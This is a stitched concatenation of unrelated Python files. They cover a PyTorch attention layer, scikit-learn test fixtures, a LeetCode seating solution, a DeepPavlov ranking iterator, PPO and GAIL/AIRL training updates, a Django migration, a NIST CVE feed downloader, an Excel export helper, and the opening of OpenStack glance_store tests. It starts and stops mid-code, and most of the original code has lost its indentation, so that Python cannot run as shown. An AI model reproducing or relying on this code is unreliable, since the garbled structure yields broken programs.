token_input: batch x 10 x max_token_len x 768
token_mask: batch x 10 x 13
"""
# Get attention
cls_input = self.conf_linear(cls_input)
attn = torch.matmul(cls_input.unsqueeze(dim=2), token_input.transpose(2,3)).squeeze(2) # batch x 10 x 13
if token_mask is not None:
attn.data.masked_fill_((token_mask == 0).data, -float('inf')) #batch x 10 x 13
attn = self.softmax(attn)
new_attn = torch.where(attn != attn, torch.zeros_like(attn), attn)
weighted_token_input = torch.matmul(new_attn.unsqueeze(dim=2), token_input).squeeze(2) # batch x 10 x 768
return weighted_token_input, attn
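# --- Illustrative sketch (not part of the classes above) ---
# The masking pattern used in SoftAttention.forward, on hypothetical shapes:
# padded token positions are filled with -inf before the softmax, and rows
# that are entirely padding (softmax over all -inf yields NaN) are zeroed out.
#   scores = torch.randn(2, 10, 13)             # batch x configs x tokens
#   token_mask = torch.ones(2, 10, 13)          # 1 = real token, 0 = padding
#   scores = scores.masked_fill(token_mask == 0, -float('inf'))
#   attn = torch.softmax(scores, dim=2)
#   attn = torch.where(attn != attn, torch.zeros_like(attn), attn)  # NaN -> 0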
|
import logging
from dataclasses import dataclass
from enum import Enum
from functools import wraps
import numpy as np
import pytest
from sklearn.base import BaseEstimator
from sklearn.base import TransformerMixin
from sklearn.datasets import load_boston
from sklearn.datasets import load_iris
from sklearn.decomposition import PCA
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import RandomForestRegressor
from sklearn.model_selection import train_test_split
from sklearn.pipeline import FeatureUnion
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
@dataclass
class TrainTestSet:
X_train: np.ndarray
X_test: np.ndarray
y_train: np.ndarray
y_test: np.ndarray
class SomeEnum(Enum):
A = 1
B = 2
class TransformerWithEnum(BaseEstimator, TransformerMixin):
def __init__(self, param: SomeEnum):
self.param = param
def fit(self, X, y):
return self
def transform(self, X):
return X
@pytest.fixture(scope="function")
def regression_model(request):
pipeline = Pipeline(
steps=[
(
"fu",
FeatureUnion(
transformer_list=[
("ss", StandardScaler()),
("pca", PCA()),
]
),
),
("et", TransformerWithEnum(param=SomeEnum.A)),
("rf", RandomForestRegressor()),
]
)
return pipeline
@pytest.fixture(scope="function")
def classification_model(request):
pipeline = Pipeline(
steps=[
(
"fu",
FeatureUnion(
transformer_list=[
("ss", StandardScaler()),
("pca", PCA()),
]
),
),
("et", TransformerWithEnum(param=SomeEnum.A)),
("rf", RandomForestClassifier()),
]
)
return pipeline
@pytest.fixture(scope="function")
def classification_model_multi(request):
pipeline = Pipeline(
steps=[
(
"fu",
FeatureUnion(
transformer_list=[
("ss", StandardScaler()),
("ss2", StandardScaler()),
("pca", PCA()),
("pca2", PCA()),
]
),
),
("et", TransformerWithEnum(param=SomeEnum.A)),
("rf", RandomForestClassifier()),
]
)
return pipeline
@pytest.fixture
def boston(request):
X, y = load_boston(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=0.25, random_state=42
)
return {
"X_train": X_train,
"X_test": X_test,
"y_train": y_train,
"y_test": y_test,
}
@pytest.fixture
def iris(request):
X, y = load_iris(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=0.25, random_state=42
)
iris = TrainTestSet(
X_train=X_train,
X_test=X_test,
y_train=y_train,
y_test=y_test,
)
return iris
@pytest.fixture(scope="function")
def simple_decorator(request):
def decorator(func, **dkwargs):
@wraps(func)
def wrapper(*args, **kwargs):
logging.info("hello world")
return func(*args, **kwargs)
return wrapper
return decorator
@pytest.fixture(params=[False, True])
def full(request):
return request.param
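# A sketch of how the fixtures above are typically combined in a test
# (assumes pytest collects this module; fit/score are the scikit-learn API):
def test_classification_model_fits_iris(classification_model, iris):
    """Smoke test: the classification pipeline trains and scores on the iris split."""
    classification_model.fit(iris.X_train, iris.y_train)
    assert classification_model.score(iris.X_test, iris.y_test) > 0.5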
|
import re
class BleHelper:
@classmethod
def uuid_filter(cls, uuid):
return re.sub(r"[^0-9abcdef]", "", uuid.lower())
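# Example: filtering a standard 128-bit UUID string keeps only lowercase hex.
assert BleHelper.uuid_filter("6E400001-B5A3-F393-E0A9-E50E24DCCA9E") == "6e400001b5a3f393e0a9e50e24dcca9e"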
|
#
# @lc app=leetcode id=849 lang=python3
#
# [849] Maximize Distance to Closest Person
#
# https://leetcode.com/problems/maximize-distance-to-closest-person/description/
#
# algorithms
# Medium (44.73%)
# Likes: 2313
# Dislikes: 154
# Total Accepted: 155.4K
# Total Submissions: 330K
# Testcase Example: '[1,0,0,0,1,0,1]'
#
# You are given an array representing a row of seats where seats[i] = 1
# represents a person sitting in the i^th seat, and seats[i] = 0 represents
# that the i^th seat is empty (0-indexed).
#
# There is at least one empty seat, and at least one person sitting.
#
# Alex wants to sit in the seat such that the distance between him and the
# closest person to him is maximized.
#
# Return that maximum distance to the closest person.
#
#
# Example 1:
#
#
# Input: seats = [1,0,0,0,1,0,1]
# Output: 2
# Explanation:
# If Alex sits in the second open seat (i.e. seats[2]), then the closest person
# has distance 2.
# If Alex sits in any other open seat, the closest person has distance 1.
# Thus, the maximum distance to the closest person is 2.
#
#
# Example 2:
#
#
# Input: seats = [1,0,0,0]
# Output: 3
# Explanation:
# If Alex sits in the last seat (i.e. seats[3]), the closest person is 3 seats
# away.
# This is the maximum distance possible, so the answer is 3.
#
#
# Example 3:
#
#
# Input: seats = [0,1]
# Output: 1
#
#
#
# Constraints:
#
#
# 2 <= seats.length <= 2 * 10^4
# seats[i] is 0 or 1.
# At least one seat is empty.
# At least one seat is occupied.
#
#
#
# @lc code=start
from typing import List
class Solution:
def maxDistToClosest(self, seats: List[int]) -> int:
first_loc = -1
last_loc = -1
n = len(seats)
locs = []
for i in range(n):
if seats[i] == 1:
locs.append(i)
first_loc = locs[0]
last_loc = locs[-1]
distances = [first_loc, n-last_loc-1]
for i in range(1, len(locs)):
diff = locs[i] - locs[i-1]
distances.append(diff // 2)
return max(distances)
# @lc code=end
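# Local sanity checks using the three examples from the problem statement.
if __name__ == "__main__":
    s = Solution()
    assert s.maxDistToClosest([1, 0, 0, 0, 1, 0, 1]) == 2
    assert s.maxDistToClosest([1, 0, 0, 0]) == 3
    assert s.maxDistToClosest([0, 1]) == 1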
|
# -*- coding: utf-8 -*-
from django.apps import AppConfig
class MezaExtConfig(AppConfig):
name = 'mezaext'
verbose_name = u'CMS расширения'
|
from deeppavlov.core.common.registry import register
from deeppavlov.core.data.data_learning_iterator import DataLearningIterator
import numpy as np
import random
from typing import Dict, List, Tuple
@register('ranking_iterator')
class RankingIterator(DataLearningIterator):
"""The class contains methods for iterating over a dataset for ranking in training, validation and test mode.
Note:
Each sample in ``data['train']`` is arranged as follows:
``{'context': 21507, 'response': 7009, 'pos_pool': [7009, 7010], 'neg_pool': None}``.
The context has a 'context' key in the data sample.
It is represented by a single integer.
The correct response has the 'response' key in the sample,
its value is also always a single integer.
The list of possible correct responses (there may be several) can be
obtained
with the 'pos\_pool' key.
The value of the 'response' should be equal to the one item from the
list
obtained using the 'pos\_pool' key.
The list of possible negative responses (there can be a lot of them,
100–10000) is represented by the key 'neg\_pool'.
Its value is None, when global sampling is used, or the list of fixed
length, when sampling from predefined negative responses is used.
It is important that values in 'pos\_pool' and 'negative\_pool' do
not overlap.
Single items in 'context', 'response', 'pos\_pool', 'neg\_pool' are
represented
by single integers that give lists of integers
using some dictionary `integer–list of integers`.
These lists of integers are converted to lists of tokens with
some dictionary `integer–token`.
Samples in ``data['valid']`` and ``data['test']`` representation are almost the same
as the train sample shown above.
Args:
data: A dictionary containing training, validation and test parts of the dataset obtainable via
``train``, ``valid`` and ``test`` keys.
sample_candidates_pool: Whether to sample candidates from a predefined pool of candidates
for each sample in training mode. If ``False``, negative sampling from the whole data will be performed.
sample_candidates_pool_valid: Whether to validate a model on a predefined pool of candidates for each sample.
If ``False``, sampling from the whole data will be performed for validation.
sample_candidates_pool_test: Whether to test a model on a predefined pool of candidates for each sample.
If ``False``, sampling from the whole data will be performed for test.
num_negative_samples: A size of a predefined pool of candidates
or a size of data subsample from the whole data in training mode.
num_ranking_samples_valid: A size of a predefined pool of candidates
or a size of data subsample from the whole data in validation mode.
num_ranking_samples_test: A size of a predefined pool of candidates
or a size of data subsample from the whole data in test mode.
seed: Random seed.
shuffle: Whether to shuffle data.
len_vocab: A length of a vocabulary to perform sampling in training, validation and test mode.
pos_pool_sample: Whether to sample response from `pos_pool` each time when the batch is generated.
If ``False``, the response from `response` will be used.
pos_pool_rank: Whether to count samples from the whole `pos_pool` as correct answers in test / validation mode.
random_batches: Whether to choose batches randomly or iterate over data sequentially in training mode.
batches_per_epoch: A number of batches to choose per each epoch in training mode.
Only required if ``random_batches`` is set to ``True``.
triplet_mode: Whether to use a model with triplet loss.
If ``False``, a model with crossentropy loss will be used.
hard_triplets_sampling: Whether to use hard triplets method of sampling in training mode.
num_positive_samples: A number of contexts to choose from `pos_pool` for each `context`.
Only required if ``hard_triplets_sampling`` is set to ``True``.
"""
def __init__(self,
data: Dict[str, List],
sample_candidates_pool: bool = False,
sample_candidates_pool_valid: bool = True,
sample_candidates_pool_test: bool = True,
num_negative_samples: int = 10,
num_ranking_samples_valid: int = 10,
num_ranking_samples_test: int = 10,
seed: int = None,
shuffle: bool = False,
len_vocab: int = 0,
pos_pool_sample: bool = False,
pos_pool_rank: bool = True,
random_batches: bool = False,
batches_per_epoch: int = None,
triplet_mode: bool = True,
hard_triplets_sampling: bool = False,
num_positive_samples: int = 5):
self.sample_candidates_pool = sample_candidates_pool
self.sample_candidates_pool_valid = sample_candidates_pool_valid
self.sample_candidates_pool_test = sample_candidates_pool_test
self.num_negative_samples = num_negative_samples
self.num_ranking_samples_valid = num_ranking_samples_valid
self.num_ranking_samples_test = num_ranking_samples_test
self.len_vocab = len_vocab
self.pos_pool_sample = pos_pool_sample
self.pos_pool_rank = pos_pool_rank
self.random_batches = random_batches
self.batches_per_epoch = batches_per_epoch
self.triplet_mode = triplet_mode
self.hard_triplets_sampling = hard_triplets_sampling
self.num_positive_samples = num_positive_samples
np.random.seed(seed)
self.train = data.get('train', [])
self.valid = data.get('valid', [])
self.test = data.get('test', [])
self.data = {
'train': self.train,
'valid': self.valid,
'test': self.test,
'all': self.train + self.test + self.valid
}
super().__init__(self.data, seed=seed, shuffle=shuffle)
def gen_batches(self, batch_size: int, data_type: str = "train", shuffle: bool = True)->\
Tuple[List[List[Tuple[int, int]]], List[int]]:
"""Generate batches of inputs and expected outputs to train neural networks.
Args:
batch_size: number of samples in batch
data_type: can be either 'train', 'test', or 'valid'
shuffle: whether to shuffle dataset before batching
Returns:
A tuple of a batch of inputs and a batch of expected outputs.
Inputs and expected outputs have different structure and meaning
depending on class attributes values and ``data_type``.
"""
data = self.data[data_type]
if self.random_batches and self.batches_per_epoch is not None and data_type == "train":
num_steps = self.batches_per_epoch
assert(batch_size <= len(data))
else:
num_steps = len(data) // batch_size
if data_type == "train":
if shuffle:
np.random.shuffle(data)
for i in range(num_steps):
if self.random_batches:
context_response_data = np.random.choice(data, size=batch_size, replace=False)
else:
context_response_data = data[i * batch_size:(i + 1) * batch_size]
context = [el["context"] for el in context_response_data]
if self.pos_pool_sample:
response = [random.choice(el["pos_pool"]) for el in context_response_data]
else:
response = [el["response"] for el in context_response_data]
if self.triplet_mode:
negative_response = self._create_neg_resp_rand(context_response_data, batch_size)
if self.hard_triplets_sampling:
labels = [el["label"] for el in context_response_data]
positives = [random.choices(el["pos_pool"], k=self.num_positive_samples)
for el in context_response_data]
x = [[(context[i], el) for el in positives[i]] for i in range(len(context_response_data))]
y = labels
else:
x = [[(context[i], el) for el in [response[i]] + [negative_response[i]]]
for i in range(len(context_response_data))]
y = batch_size * [np.ones(2)]
else:
y = [el["label"] for el in context_response_data]
x = [[(context[i], response[i])] for i in range(len(context_response_data))]
yield (x, y)
if data_type in ["valid", "test"]:
for i in range(num_steps + 1):
if i < num_steps:
context_response_data = data[i * batch_size:(i + 1) * batch_size]
else:
if len(data[i * batch_size:len(data)]) > 0:
context_response_data = data[i * batch_size:len(data)]
context = [el["context"] for el in context_response_data]
if data_type == "valid":
ranking_length = self.num_ranking_samples_valid
sample_candidates_pool = self.sample_candidates_pool_valid
elif data_type == "test":
ranking_length = self.num_ranking_samples_test
sample_candidates_pool = self.sample_candidates_pool_test
if not sample_candidates_pool:
ranking_length = self.len_vocab
response_data = self._create_rank_resp(context_response_data, ranking_length)
if self.pos_pool_rank:
y = [len(el["pos_pool"]) * np.ones(ranking_length) for el in context_response_data]
else:
y = [np.ones(ranking_length) for _ in context_response_data]
x = [[(context[i], el) for el in response_data[i]] for i in range(len(context_response_data))]
yield (x, y)
def _create_neg_resp_rand(self, context_response_data, batch_size):
"""Randomly chooses negative response for each context in a batch.
Sampling is performed from predefined pools of candidates or from the whole data.
Args:
context_response_data: A batch from the train part of the dataset.
batch_size: A batch size.
Returns:
one negative response for each context in a batch.
"""
if self.sample_candidates_pool:
negative_response_data = [random.choice(el["neg_pool"])
for el in context_response_data]
else:
candidates = []
for i in range(batch_size):
candidate = np.random.randint(0, self.len_vocab, 1)[0]
while candidate in context_response_data[i]["pos_pool"]:
candidate = np.random.randint(0, self.len_vocab, 1)[0]
candidates.append(candidate)
negative_response_data = candidates
return negative_response_data
def _create_rank_resp(self, context_response_data, ranking_length):
"""Chooses a set of negative responses for each context in a batch to evaluate ranking quality.
Negative responses are taken from predefined pools of candidates or from the whole data.
Args:
context_response_data: A batch from the train part of the dataset.
ranking_length: a number of responses for each context to evaluate ranking quality.
Returns:
list of responses for each context in a batch.
"""
response_data = []
for i in range(len(context_response_data)):
pos_pool = context_response_data[i]["pos_pool"]
resp = context_response_data[i]["response"]
if self.pos_pool_rank:
pos_pool.insert(0, pos_pool.pop(pos_pool.index(resp)))
else:
pos_pool = [resp]
neg_pool = context_response_data[i]["neg_pool"]
response = pos_pool + neg_pool
response_data.append(response[:ranking_length])
return response_data
|
import torch
from torch import autograd
from torch.nn import functional as F
from torch.nn.utils import clip_grad_norm_
from torch.utils.data import DataLoader, Dataset
# Dataset that returns transition tuples of the form (s, a, r, s', terminal)
class TransitionDataset(Dataset):
def __init__(self, transitions):
super().__init__()
self.states, self.actions, self.rewards, self.terminals = transitions['states'], transitions['actions'].detach(), transitions['rewards'], transitions['terminals'] # Detach actions
# Allows string-based access for entire data of one type, or int-based access for single transition
def __getitem__(self, idx):
if isinstance(idx, str):
if idx == 'states':
return self.states
elif idx == 'actions':
return self.actions
else:
return dict(states=self.states[idx], actions=self.actions[idx], rewards=self.rewards[idx], next_states=self.states[idx + 1], terminals=self.terminals[idx])
def __len__(self):
return self.terminals.size(0) - 1 # Need to return state and next state
# Computes and stores generalised advantage estimates ψ in the set of trajectories
def compute_advantages(trajectories, next_value, discount, trace_decay):
with torch.no_grad(): # Do not differentiate through advantage calculation
reward_to_go, advantage = torch.tensor([0.]), torch.tensor([0.])
trajectories['rewards_to_go'], trajectories['advantages'] = torch.empty_like(trajectories['rewards']), torch.empty_like(trajectories['rewards'])
for t in reversed(range(trajectories['states'].size(0))):
reward_to_go = trajectories['rewards'][t] + (1 - trajectories['terminals'][t]) * (discount * reward_to_go) # Reward-to-go/value R
trajectories['rewards_to_go'][t] = reward_to_go
td_error = trajectories['rewards'][t] + (1 - trajectories['terminals'][t]) * discount * next_value - trajectories['values'][t] # TD-error δ
advantage = td_error + (1 - trajectories['terminals'][t]) * discount * trace_decay * advantage # Generalised advantage estimate ψ
trajectories['advantages'][t] = advantage
next_value = trajectories['values'][t]
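# Minimal usage sketch for compute_advantages (hypothetical 3-step trajectory;
# the dict keys mirror the ones read and written above):
#   trajectories = dict(
#       states=torch.zeros(3, 4),
#       rewards=torch.tensor([1., 0., 1.]),
#       terminals=torch.tensor([0., 0., 1.]),
#       values=torch.tensor([0.5, 0.4, 0.3]),
#   )
#   compute_advantages(trajectories, torch.tensor([0.]), discount=0.99, trace_decay=0.95)
#   # fills trajectories['rewards_to_go'] and trajectories['advantages'] in place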
# Performs one PPO update (assumes trajectories for first epoch are attached to agent)
def ppo_update(agent, trajectories, agent_optimiser, ppo_clip, epoch, value_loss_coeff=1, entropy_reg_coeff=1):
# Recalculate outputs for subsequent iterations
if epoch > 0:
policy, trajectories['values'] = agent(trajectories['states'])
trajectories['log_prob_actions'], trajectories['entropies'] = policy.log_prob(trajectories['actions'].detach()), policy.entropy()
policy_ratio = (trajectories['log_prob_actions'] - trajectories['old_log_prob_actions']).exp()
policy_loss = -torch.min(policy_ratio * trajectories['advantages'], torch.clamp(policy_ratio, min=1 - ppo_clip, max=1 + ppo_clip) * trajectories['advantages']).mean() # Update the policy by maximising the clipped PPO objective
value_loss = F.mse_loss(trajectories['values'], trajectories['rewards_to_go']) # Fit value function by regression on mean squared error
entropy_reg = -trajectories['entropies'].mean() # Add entropy regularisation
agent_optimiser.zero_grad()
(policy_loss + value_loss_coeff * value_loss + entropy_reg_coeff * entropy_reg).backward()
clip_grad_norm_(agent.parameters(), 1) # Clamp norm of gradients
agent_optimiser.step()
# Performs a behavioural cloning update
def behavioural_cloning_update(agent, expert_trajectories, agent_optimiser, batch_size):
expert_dataloader = DataLoader(expert_trajectories, batch_size=batch_size, shuffle=True, drop_last=True)
for expert_transition in expert_dataloader:
expert_state, expert_action = expert_transition['states'], expert_transition['actions']
agent_optimiser.zero_grad()
behavioural_cloning_loss = -agent.log_prob(expert_state, expert_action).mean() # Maximum likelihood objective
behavioural_cloning_loss.backward()
agent_optimiser.step()
# Performs a target estimation update
def target_estimation_update(discriminator, expert_trajectories, discriminator_optimiser, batch_size):
expert_dataloader = DataLoader(expert_trajectories, batch_size=batch_size, shuffle=True, drop_last=True)
for expert_transition in expert_dataloader:
expert_state, expert_action = expert_transition['states'], expert_transition['actions']
discriminator_optimiser.zero_grad()
prediction, target = discriminator(expert_state, expert_action)
regression_loss = F.mse_loss(prediction, target)
regression_loss.backward()
discriminator_optimiser.step()
# Performs an adversarial imitation learning update
def adversarial_imitation_update(algorithm, agent, discriminator, expert_trajectories, policy_trajectories, discriminator_optimiser, batch_size, r1_reg_coeff=1):
expert_dataloader = DataLoader(expert_trajectories, batch_size=batch_size, shuffle=True, drop_last=True)
policy_dataloader = DataLoader(policy_trajectories, batch_size=batch_size, shuffle=True, drop_last=True)
# Iterate over the minimum of expert and policy data
for expert_transition, policy_transition in zip(expert_dataloader, policy_dataloader):
expert_state, expert_action, expert_next_state, expert_terminal = expert_transition['states'], expert_transition['actions'], expert_transition['next_states'], expert_transition['terminals']
policy_state, policy_action, policy_next_state, policy_terminal = policy_transition['states'], policy_transition['actions'], policy_transition['next_states'], policy_transition['terminals']
if algorithm == 'GAIL':
D_expert = discriminator(expert_state, expert_action)
D_policy = discriminator(policy_state, policy_action)
elif algorithm == 'AIRL':
with torch.no_grad():
expert_data_policy = agent.log_prob(expert_state, expert_action).exp()
policy_data_policy = agent.log_prob(policy_state, policy_action).exp()
D_expert = discriminator(expert_state, expert_action, expert_next_state, expert_data_policy, expert_terminal)
D_policy = discriminator(policy_state, policy_action, policy_next_state, policy_data_policy, policy_terminal)
# Binary logistic regression
discriminator_optimiser.zero_grad()
expert_loss = F.binary_cross_entropy(D_expert, torch.ones_like(D_expert)) # Loss on "real" (expert) data
autograd.backward(expert_loss, create_graph=True)
r1_reg = 0
for param in discriminator.parameters():
r1_reg += param.grad.norm().mean() # R1 gradient penalty
policy_loss = F.binary_cross_entropy(D_policy, torch.zeros_like(D_policy)) # Loss on "fake" (policy) data
(policy_loss + r1_reg_coeff * r1_reg).backward()
discriminator_optimiser.step()
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Inventory', '0017_auto_20151227_1321'),
]
operations = [
migrations.AddField(
model_name='orderhistorymodel',
name='DocumentStatus',
field=models.CharField(default='pagado', max_length=50),
preserve_default=False,
),
migrations.AddField(
model_name='orderhistorymodel',
name='Type',
field=models.CharField(default='po', max_length=20, choices=[(b'PO', b'Orden de compra'), (b'SO', b'Orden de venta')]),
preserve_default=False,
),
]
|
"""NIST CVE data downloader."""
import asyncio
import logging
from concurrent import futures
from datetime import datetime
from functools import cached_property
from typing import AsyncIterator, Optional, Set, Type
import aiohttp
import abstracts
from aio.core import event
from aio.core.functional import async_property, QueryDict
from aio.core.tasks import concurrent
from aio.api.nist import abstract, typing
logger = logging.getLogger(__name__)
NIST_URL_TPL = (
"https://nvd.nist.gov/feeds/json/cve/1.1/nvdcve-1.1-{year}.json.gz")
SCAN_FROM_YEAR = 2018
@abstracts.implementer(event.IExecutive)
class ANISTDownloader(event.AExecutive, metaclass=abstracts.Abstraction):
def __init__(
self,
tracked_cpes: "typing.TrackedCPEDict",
cve_fields: Optional[QueryDict] = None,
ignored_cves: Optional[Set] = None,
since: Optional[int] = None,
loop: Optional[asyncio.AbstractEventLoop] = None,
pool: Optional[futures.Executor] = None,
session: Optional[aiohttp.ClientSession] = None) -> None:
self._since = since
self.cve_fields = cve_fields
self.ignored_cves = ignored_cves
self.tracked_cpes = tracked_cpes
self._session = session
self._loop = loop
self._pool = pool
async def __aiter__(self) -> AsyncIterator[str]:
async for url in self.downloads:
yield url
@cached_property
def cpe_revmap(self) -> "typing.CPERevmapDict":
"""Collected reverse mapping of CPEs."""
return {}
@cached_property
def cves(self) -> "typing.CVEDict":
"""Collected CVEs."""
return {}
@property
def downloaders(self) -> "typing.DownloadGenerator":
"""Download co-routines for NIST data."""
for url in self.urls:
yield self.download_and_parse(url)
@async_property
async def downloads(self) -> AsyncIterator[str]:
"""CVE data derived from parsing NIST CVE data."""
async for download in concurrent(self.downloaders):
yield download.url
@property
def nist_url_tpl(self) -> str:
"""Default URL template string for NIST downloads."""
return NIST_URL_TPL
@cached_property
def parser(self) -> "abstract.ANISTParser":
"""NIST CVE parser, to be run in processor pool."""
return self.parser_class(
self.tracked_cpes,
cve_fields=self.cve_fields,
ignored_cves=self.ignored_cves)
@property # type:ignore
@abstracts.interfacemethod
def parser_class(self) -> Type["abstract.ANISTParser"]:
"""NIST parser class."""
raise NotImplementedError
@property
def scan_year_end(self) -> int:
"""Inclusive end year to scan to."""
return datetime.now().year + 1
@cached_property
def session(self) -> aiohttp.ClientSession:
"""HTTP client session."""
return self._session or aiohttp.ClientSession()
@property
def since(self) -> int:
return max(
self._since or SCAN_FROM_YEAR,
SCAN_FROM_YEAR)
@property
def urls(self) -> Set[str]:
"""URLs to fetch NIST data from."""
return set(
self.nist_url_tpl.format(year=year)
for year
in self.years)
@property
def years(self) -> range:
"""Range of years to scan."""
return range(
self.since,
self.scan_year_end)
def add(
self,
cves: "typing.CVEDict",
cpe_revmap: "typing.CPERevmapDict") -> None:
"""Capture incoming CVE data."""
self.cves.update(cves)
self.cpe_revmap.update(cpe_revmap)
async def download_and_parse(self, url: str) -> aiohttp.ClientResponse:
"""Async download and parsing of CVE data."""
download = await self.session.get(url)
logger.debug(f"Downloading CVE data: {url}")
self.add(*await self.parse(url, await download.read()))
logger.debug(f"CVE data saved: {url}")
return download
async def parse(self, url: str, data: bytes) -> "typing.CVEDataTuple":
"""Parse incoming data in executor."""
# Uncomment the following line to run the parser in this process instead of
# a separate executor process - useful for debugging.
# return self.parser(data)
logger.debug(f"Parsing CVE data: {url}")
return await self.execute(
self.parser,
data)
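# For reference, the downloader only fetches the yearly NIST feeds; e.g. with
# since=2020 and a scan_year_end of 2023, self.urls would contain:
#   https://nvd.nist.gov/feeds/json/cve/1.1/nvdcve-1.1-2020.json.gz
#   https://nvd.nist.gov/feeds/json/cve/1.1/nvdcve-1.1-2021.json.gz
#   https://nvd.nist.gov/feeds/json/cve/1.1/nvdcve-1.1-2022.json.gz
# (range(since, scan_year_end) excludes the end year itself).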
|
from openpyxl import Workbook
from openpyxl.utils import get_column_letter
from openpyxl.styles import Font, PatternFill, colors
from openpyxl.utils.dataframe import dataframe_to_rows
def create_workbook_from_dataframe(df):
"""
1. Create workbook from specified pandas.DataFrame
2. Adjust columns width to fit the text inside
3. Make the index column and the header row bold
4. Fill background color for the header row
Any other beautification MUST be done by the caller.
"""
workbook = Workbook()
ws = workbook.active
rows = dataframe_to_rows(df.reset_index(), index=False)
col_widths = [0] * (len(df.columns) + 1)
for i, row in enumerate(rows, 1):
for j, val in enumerate(row, 1):
if type(val) is str:
cell = ws.cell(row=i, column=j, value=val)
col_widths[j - 1] = max([col_widths[j - 1], len(str(val))])
elif hasattr(val, "sort"):
cell = ws.cell(row=i, column=j, value=", ".join(list(map(lambda v: str(v), list(val)))))
col_widths[j - 1] = max([col_widths[j - 1], len(str(val))])
else:
cell = ws.cell(row=i, column=j, value=val)
col_widths[j - 1] = max([col_widths[j - 1], len(str(val)) + 1])
# Make the index column and the header row bold
if i == 1 or j == 1:
cell.font = Font(bold=True)
# Fill background color for the header row
if i == 1:
cell.fill = PatternFill('solid', fgColor=colors.YELLOW)
# Adjust column width
for i, w in enumerate(col_widths):
letter = get_column_letter(i + 1)
ws.column_dimensions[letter].width = w
return workbook
def fill_cell_color(cell, color, fill_type='solid'):
cell.fill = PatternFill(fill_type, fgColor=('00' + color))
def fill_text_color(cell, color, bold=False):
cell.font = Font(color=color, bold=bold)
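# Example usage (a sketch; assumes pandas is installed alongside openpyxl):
#   import pandas as pd
#   df = pd.DataFrame({"name": ["alice", "bob"], "score": [90, 85]})
#   wb = create_workbook_from_dataframe(df)
#   fill_cell_color(wb.active["A2"], "FFCC00")          # highlight one data cell
#   fill_text_color(wb.active["B1"], "00FF0000", bold=True)
#   wb.save("report.xlsx")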
|
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests the filesystem backend store"""
import errno
import hashlib
import json
import os
import stat
from unittest import mock
import uuid
import fixtures
from oslo_utils.secretutils import md5
from oslo_utils import units
import six
from six.moves import builtins
# NOTE(jokke): simplified transition to py3, behaves like py2 xrange
from six.moves import range
from glance_store._drivers import filesystem
from glance_store import exceptions
from glance_store import location
from glance_store.tests import base
from glance_store.tests.unit import test_store_capabilities
class TestStore(base.StoreBaseTest,
test_store_capabilities.TestStoreCapabilitiesChecking):
def setUp(self):
"""Establish a clean test environment."""
super(TestStore, self).setUp()
self.store = filesystem.Store(self.conf)
self.config(filesystem_store_datadir=self.test_dir,
filesystem_store_chunk_size=10,
stores=['glance.store.filesystem.Store'],
group="glance_store")
self.store.configure()
self.register_store_schemes(self.store, 'file')
self.hash_algo = 'sha256'
def _create_metadata_json_file(self, metadata):
expected_image_id = str(uuid.uuid4())
jsonfilename = os.path.join(self.test_dir,
"storage_metadata.%s" % expected_image_id)
self.config(filesystem_store_metadata_file=jsonfilename,
group="glance_store")
with open(jsonfilename, 'w') as fptr:
json.dump(metadata, fptr)
def _store_image(self, in_metadata):
expected_image_id = str(uuid.uuid4())
expected_file_size = 10
expected_file_contents = b"*" * expected_file_size
image_file = six.BytesIO(expected_file_contents)
self.store.FILESYSTEM_STORE_METADATA = in_metadata
return self.store.add(expected_image_id, image_file,
expected_file_size, self.hash_algo)
def test_get(self):
"""Test a "normal" retrieval of an image in chunks."""
# First add an image...
image_id = str(uuid.uuid4())
file_contents = b"chunk00000remainder"
image_file = six.BytesIO(file_contents)
loc, size, checksum, multihash, _ = self.store.add(
image_id, image_file, len(file_contents), self.hash_algo)
# Now read it back...
uri = "file:///%s/%s" % (self.test_dir, image_id)
loc = location.get_location_from_uri(uri, conf=self.conf)
(image_file, image_size) = self.store.get(loc)
expected_data = b"chunk00000remainder"
expected_num_chunks = 2
data = b""
num_chunks = 0
for chunk in image_file:
num_chunks += 1
data += chunk
self.assertEqual(expected_data, data)
self.assertEqual(expected_num_chunks, num_chunks)
def test_get_random_access(self):
"""Test a "normal" retrieval of an image in chunks."""
# First add an image...
image_id = str(uuid.uuid4())
file_contents = b"chunk00000remainder"
image_file = six.BytesIO(file_contents)
loc, size, checksum, multihash, _ = self.store.add(
image_id, image_file, len(file_contents), self.hash_algo)
# Now read it back...
uri = "file:///%s/%s" % (self.test_dir, image_id)
loc = location.get_location_from_uri(uri, conf=self.conf)
data = b""
for offset in range(len(file_contents)):
(image_file, image_size) = self.store.get(loc,
offset=offset,
chunk_size=1)
for chunk in image_file:
data += chunk
self.assertEqual(file_contents, data)
data = b""
chunk_size = 5
(image_file, image_size) = self.store.get(loc,
offset=chunk_size,
chunk_size=chunk_size)
for chunk in image_file:
data += chunk
self.assertEqual(b'00000', data)
self.assertEqual(chunk_size, image_size)
def test_get_non_existing(self):
"""
Test that trying to retrieve a file that doesn't exist
raises an error
"""
loc = location.get_location_from_uri(
"file:///%s/non-existing" % self.test_dir, conf=self.conf)
self.assertRaises(exceptions.NotFound,
self.store.get,
loc)
def _do_test_add(self, enable_thin_provisioning):
"""Test that we can add an image via the filesystem backend."""
self.config(filesystem_store_chunk_size=units.Ki,
filesystem_thin_provisioning=enable_thin_provisioning,
group='glance_store')
self.store.configure()
filesystem.ChunkedFile.CHUNKSIZE = units.Ki
expected_image_id = str(uuid.uuid4())
expected_file_size = 5 * units.Ki # 5K
expected_file_contents = b"*" * expected_file_size
expected_checksum = md5(expected_file_contents,
usedforsecurity=False).hexdigest()
expected_multihash = hashlib.sha256(expected_file_contents).hexdigest()
expected_location = "file://%s/%s" % (self.test_dir,
expected_image_id)
image_file = six.BytesIO(expected_file_contents)
loc, size, checksum, multihash, _ = self.store.add(
